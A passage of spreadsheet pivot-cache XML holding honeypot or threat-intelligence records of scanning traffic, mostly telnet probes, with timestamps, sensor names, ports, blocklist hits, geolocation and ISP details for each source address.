    <x v="2782"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T06:01:34"/>
    <d v="2025-02-25T16:09:46"/>
    <d v="2025-04-07T06:01:34"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="35"/>
    <s v="İzmir Province"/>
    <s v="NA"/>
    <s v="Izmir"/>
    <s v="311046"/>
    <s v="NA"/>
    <s v="38.4237"/>
    <s v="27.1428"/>
    <s v="47524"/>
    <s v="Turksat Uydu Haberlesme ve Kablo TV Isletme A.S."/>
    <s v="TURKSAT"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5e37:d843"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2783"/>
    <x v="2783"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T06:01:26"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-07T06:01:26"/>
    <n v="79"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="12"/>
    <s v="Dnipropetrovsk"/>
    <s v="Dnipro rural raion"/>
    <s v="Dnipro"/>
    <s v="709930"/>
    <s v="NA"/>
    <s v="48.4647"/>
    <s v="35.0462"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:bd09"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2784"/>
    <x v="2784"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T06:01:24"/>
    <d v="2025-03-01T14:55:25"/>
    <d v="2025-04-07T06:01:24"/>
    <n v="46"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Gapyeong-gun"/>
    <s v="Gapyeong County (Sincheonjungang-ro)"/>
    <s v="1843082"/>
    <s v="NA"/>
    <s v="37.6773"/>
    <s v="127.491"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afd3:d0c6"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2785"/>
    <x v="2785"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T06:01:07"/>
    <d v="2024-12-27T02:35:15"/>
    <d v="2025-04-07T06:01:07"/>
    <n v="50"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:84ee"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2786"/>
    <x v="2786"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T06:01:04"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-07T06:01:04"/>
    <n v="75"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;46535&amp;&amp;57215"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:87aa"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2787"/>
    <x v="2787"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T06:01:00"/>
    <d v="2023-10-06T22:53:00"/>
    <d v="2025-04-07T06:01:00"/>
    <n v="4176"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;31093&amp;&amp;54562&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="21"/>
    <s v="Zakarpattia"/>
    <s v="Uzhhorod Raion"/>
    <s v="Uzhhorod"/>
    <s v="690548"/>
    <s v="NA"/>
    <s v="48.6208"/>
    <s v="22.2879"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:16a3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2788"/>
    <x v="2788"/>
    <s v="NA&amp;&amp;host-79-23-223-187.retail.telecomitalia.it"/>
    <x v="0"/>
    <d v="2025-04-07T06:00:52"/>
    <d v="2025-04-06T02:20:45"/>
    <d v="2025-04-07T06:00:52"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="62"/>
    <s v="Lazio"/>
    <s v="Rome"/>
    <s v="Rome"/>
    <s v="3169070"/>
    <s v="00187"/>
    <s v="41.8919"/>
    <s v="12.5113"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="INTERBUSINESS"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4f17:dfbb"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2789"/>
    <x v="2789"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T05:56:27"/>
    <d v="2024-01-24T14:30:08"/>
    <d v="2025-04-07T05:56:27"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;23&amp;&amp;NA&amp;&amp;57673"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:86f9:3836"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2790"/>
    <x v="2790"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T05:50:38"/>
    <d v="2025-04-07T05:49:41"/>
    <d v="2025-04-07T05:50:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="['anonymous-proxy']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="True"/>
    <s v="vpn"/>
    <s v="medium"/>
    <s v="['anonymous-proxy']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1098"/>
    <s v="52.3563"/>
    <s v="4.95714"/>
    <s v="14061"/>
    <s v="DigitalOcean, LLC"/>
    <s v="DigitalOcean, LLC"/>
    <s v="hosting"/>
    <s v="DigitalOcean, LLC"/>
    <s v="2021-10-14"/>
    <s v="DO-13"/>
    <s v="2021-10-14"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:92be:1384"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2791"/>
    <x v="2791"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T05:50:21"/>
    <d v="2025-04-07T05:50:21"/>
    <d v="2025-04-07T05:50:21"/>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3:fc30"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2792"/>
    <x v="2792"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T05:26:52"/>
    <d v="2025-04-07T05:26:52"/>
    <d v="2025-04-07T05:26:52"/>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3:d0ee"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2793"/>
    <x v="2793"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T05:07:11"/>
    <d v="2025-04-06T18:20:17"/>
    <d v="2025-04-07T05:07:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Varanasi"/>
    <s v="Varanasi"/>
    <s v="1253405"/>
    <s v="NA"/>
    <s v="25.3167"/>
    <s v="83.0104"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:c69c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2794"/>
    <x v="2794"/>
    <s v="211-72-80-162.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T05:01:12"/>
    <d v="2024-04-17T07:59:51"/>
    <d v="2025-04-07T05:01:12"/>
    <n v="362"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;44351&amp;&amp;23&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="1999-11-23"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d348:50a2"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2795"/>
    <x v="2795"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T05:01:01"/>
    <d v="2024-12-07T15:10:09"/>
    <d v="2025-04-07T05:01:01"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2eb9:23b3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2796"/>
    <x v="2796"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T04:36:37"/>
    <d v="2025-04-06T13:10:45"/>
    <d v="2025-04-07T04:36:37"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:8a29"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2797"/>
    <x v="2797"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T04:35:51"/>
    <d v="2025-04-07T04:35:51"/>
    <d v="2025-04-07T04:35:51"/>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b:857c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2798"/>
    <x v="2798"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T04:26:40"/>
    <d v="2024-12-03T00:04:50"/>
    <d v="2025-04-07T04:26:40"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
